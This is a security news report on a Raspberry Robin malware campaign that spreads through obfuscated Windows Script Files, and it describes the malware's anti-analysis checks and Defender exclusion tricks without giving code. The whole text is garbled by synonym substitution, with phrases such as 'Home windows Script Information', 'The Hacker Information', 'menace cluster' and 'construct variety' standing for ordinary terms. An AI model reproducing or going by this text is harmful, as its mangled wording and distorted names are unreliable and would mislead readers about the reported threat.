Cybersecurity researchers have found a brand new Raspberry Robin marketing campaign wave that propagates the malware via malicious Home windows Script Information (WSFs) since March 2024.
“Traditionally, Raspberry Robin was identified to unfold via detachable media like USB drives, however over time its distributors have experimented with different preliminary an infection vectors,” HP Wolf Safety researcher Patrick Schläpfer stated in a report shared with The Hacker Information.
Raspberry Robin, additionally known as QNAP worm, was first noticed in September 2021 that has since developed right into a downloader for numerous different payloads in recent times, akin to SocGholish, Cobalt Strike, IcedID, BumbleBee, and TrueBot, and in addition serving as a precursor for ransomware.
Whereas the malware was initially distributed by the use of USB gadgets containing LNK information that retrieved the payload from a compromised QNAP machine, it has since adopted different strategies akin to social engineering and malvertising.
It is attributed to an rising menace cluster tracked by Microsoft as Storm-0856, which has hyperlinks to the broader cybercrime ecosystem comprising teams like Evil Corp, Silence, and TA505.
The most recent distribution vector entails the usage of WSF information which might be provided for obtain through numerous domains and subdomains.
It is presently not clear how the attackers are directing victims to those URLs, though it is suspected that it could possibly be both through spam or malvertising campaigns.
The closely obfuscated WSF file capabilities as a downloader to retrieve the primary DLL payload from a distant server utilizing the curl command, however not earlier than a collection of anti-analysis and anti-virtual machine evaluations are carried out to find out if it is being run in a virtualized setting.
It is also designed to terminate the execution if the construct variety of the Home windows working system is decrease than 17063 (which was launched in December 2017) and if the checklist of working processes consists of antivirus processes related to Avast, Avira, Bitdefender, Examine Level, ESET, and Kaspersky.
What’s extra, it configures Microsoft Defender Antivirus exclusion guidelines in an effort to sidestep detection by including all the primary drive to the exclusion checklist and stopping it from being scanned.
“The scripts itself are presently not categorized as malicious by any an-virus scanners on VirusTotal, demonstrating the evasiveness of the malware and the chance of it inflicting a severe an infection with Raspberry Robin,” HP stated.
“The WSF downloader is closely obfuscated and makes use of many an-analysis strategies enabling the malware to evade detection and decelerate evaluation.”